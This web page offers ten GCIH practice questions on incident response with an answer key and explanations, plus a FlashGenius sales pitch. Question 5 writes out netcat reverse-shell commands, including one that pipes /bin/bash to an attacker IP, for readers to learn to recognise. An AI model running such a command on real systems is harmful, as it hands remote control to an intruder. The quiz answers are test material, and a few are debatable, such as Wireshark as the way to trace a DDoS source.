GCIH Practice Questions: Incident Response and Cyber Investigation Domain

Published: August 7, 2025 | 20 min read

Test your GCIH knowledge with 10 practice questions from the Incident Response and Cyber Investigation domain. Includes detailed explanations and answers.

GCIH Practice Questions

Master the Incident Response and Cyber Investigation Domain

Test your knowledge in the Incident Response and Cyber Investigation domain with these 10 practice questions. Each question is designed to help you prepare for the GCIH certification exam with detailed explanations to reinforce your learning.

Question 1

You receive an alert about potential malware on a workstation. What is the best first step in handling this incident?

A) Immediately shut down the workstation to prevent further damage.

B) Isolate the workstation from the network to prevent spread.

C) Run a full antivirus scan on the workstation.

D) Check the workstation's event logs for suspicious activity.

Show Answer & Explanation

Correct Answer: B

Explanation: Isolating the workstation from the network (B) is the best first step as it prevents the potential spread of malware while allowing for further investigation. Shutting down the workstation (A) can result in loss of volatile data. Running a full antivirus scan (C) should be done after isolation. Checking event logs (D) is useful but should follow network isolation to prevent further compromise.

Question 2

You suspect a data exfiltration attempt on your network. Which tool would provide the most immediate insights into this activity?

A) Sysinternals Suite

B) Wireshark

C) Nmap

D) Metasploit

Show Answer & Explanation

Correct Answer: B

Explanation: Wireshark (B) is the best tool for capturing and analyzing network traffic, allowing you to identify unusual data flows indicating exfiltration. Sysinternals Suite (A) is more suited for system-level analysis, not network traffic. Nmap (C) is for network scanning, not traffic analysis. Metasploit (D) is used for penetration testing, not monitoring or analysis.

Question 3

You are the incident handler for an organization that has just detected unusual outbound traffic from a server. What is the best first step to take in response to this incident?

A) Immediately shut down the server to prevent data exfiltration.

B) Conduct a full forensic analysis of the server.

C) Isolate the server from the network to contain the potential threat.

D) Notify all employees about the incident.

Show Answer & Explanation

Correct Answer: C

Explanation: The best first step is to isolate the server from the network (Option C) to prevent further data exfiltration or spread of the threat. Shutting down the server (Option A) may destroy volatile data, and conducting a full forensic analysis (Option B) is time-consuming and not an immediate containment step. Notifying all employees (Option D) is not a first response action.

Question 4

During an incident response, you receive an alert about potential data exfiltration through a specific server. What is the most effective initial action to take?

A) Immediately shut down the server to prevent further data loss.

B) Capture network traffic using Wireshark for detailed analysis.

C) Review server logs to identify any unauthorized access.

D) Isolate the server from the network to contain the incident.

Show Answer & Explanation

Correct Answer: D

Explanation: The most effective initial action in this scenario is to isolate the server from the network (Option D) to prevent further data exfiltration and contain the incident. Shutting down the server (Option A) might result in loss of volatile data that could be crucial for the investigation. Capturing network traffic (Option B) and reviewing server logs (Option C) are important but should be done after containment to ensure that the threat is not actively causing more damage.

Question 5

During an incident response investigation, you suspect that a compromised system is being used for data exfiltration through a covert channel. You find evidence of Netcat being used on the system. Which of the following Netcat commands would most likely indicate a reverse shell used for data exfiltration?

A) nc -lvp 4444 -e /bin/bash

B) nc -e /bin/bash 192.168.1.100 4444

C) nc 192.168.1.100 4444 < /dev/null

D) nc -l -p 4444 > output.txt

Show Answer & Explanation

Correct Answer: B

Explanation: Option B represents a reverse shell initiated by the compromised system, connecting back to the attacker's machine at IP address 192.168.1.100 on port 4444 and executing /bin/bash. This is a common method for establishing a covert channel for data exfiltration. Option A is a listener command, which is not used for initiating a reverse connection. Option C is a simple TCP connection that doesn't execute a shell. Option D is a listener that writes incoming data to a file, not a reverse shell.

Question 6

You are the first responder to a suspected malware infection on a workstation. What is the best first step you should take?

A) Isolate the workstation from the network.

B) Delete the suspicious files.

C) Run a full antivirus scan.

D) Reboot the workstation in safe mode.

Show Answer & Explanation

Correct Answer: A

Explanation: Isolating the workstation from the network is the best first step as it prevents the potential spread of malware to other systems while preserving the current state for further analysis. Deleting files (Option B) could destroy evidence. Running a full antivirus scan (Option C) is useful but should be done after isolation to prevent further spread. Rebooting in safe mode (Option D) could alter the system state and is not an immediate containment action.

Question 7

An incident handler is tasked with identifying the source of a DDoS attack. Which tool would be most effective for this task?

A) Wireshark

B) Nmap

C) Snort

D) Exiftool

Show Answer & Explanation

Correct Answer: A

Explanation: Wireshark (A) is effective for capturing and analyzing network traffic, which is crucial in identifying the source of a DDoS attack. Nmap (B) is used for network scanning, not traffic analysis. Snort (C) is an IDS and can detect attacks but is not primarily used for identifying sources. Exiftool (D) is used for metadata extraction from files and is irrelevant in this context.

Question 8

You receive an alert about a possible data breach involving sensitive customer data. What should be your first priority?

A) Contact the affected customers to inform them of the breach.

B) Begin an immediate forensic investigation to confirm the breach.

C) Contain the breach to prevent further data loss.

D) Notify law enforcement of the potential breach.

Show Answer & Explanation

Correct Answer: C

Explanation: Containing the breach to prevent further data loss is the first priority. This action helps to limit the impact of the breach. Informing customers (Option A) is important but should occur after containment and confirmation. Starting a forensic investigation (Option B) is crucial but should follow containment to ensure the breach does not worsen. Notifying law enforcement (Option D) is typically done after confirming the breach and assessing its scope.

Question 9

After identifying suspicious network traffic, what is the most effective initial tool-based action to investigate further?

A) Use Nmap to scan the network for open ports.

B) Deploy a SIEM solution to monitor network activity.

C) Capture and analyze packets using Wireshark.

D) Set up a honeypot to attract malicious traffic.

Show Answer & Explanation

Correct Answer: C

Explanation: Capturing and analyzing packets using Wireshark (Option C) is the most effective initial tool-based action to investigate suspicious network traffic. It allows for detailed inspection of the traffic to identify potential threats. Using Nmap (Option A) and setting up a honeypot (Option D) are more proactive measures that do not directly address the immediate analysis need. Deploying a SIEM (Option B) is a long-term strategy and not an immediate action.

Question 10

An alert indicates possible unauthorized access to a critical database. What is the most effective initial action?

A) Change all database passwords immediately.

B) Review database access logs for suspicious activity.

C) Shut down the database server to prevent further access.

D) Inform the database administrator of the alert.

Show Answer & Explanation

Correct Answer: B

Explanation: Reviewing database access logs (Option B) is the most effective initial action to identify any unauthorized access patterns. Changing passwords (Option A) or shutting down the server (Option C) are premature without understanding the situation. Informing the administrator (Option D) is not a direct response action.

Ready to Accelerate Your GCIH Preparation?

Join thousands of professionals who are advancing their careers through expert certification preparation with FlashGenius.

✅ Unlimited practice questions across all GCIH domains
✅ Full-length exam simulations with real-time scoring
✅ AI-powered performance tracking and weak area identification
✅ Personalized study plans with adaptive learning
✅ Mobile-friendly platform for studying anywhere, anytime
✅ Expert explanations and study resources

Start Free Practice Now

Already have an account? Sign in here

About GCIH Certification

The GCIH certification validates your expertise in incident response and cyber investigation and other critical domains. Our comprehensive practice questions are carefully crafted to mirror the actual exam experience and help you identify knowledge gaps before test day.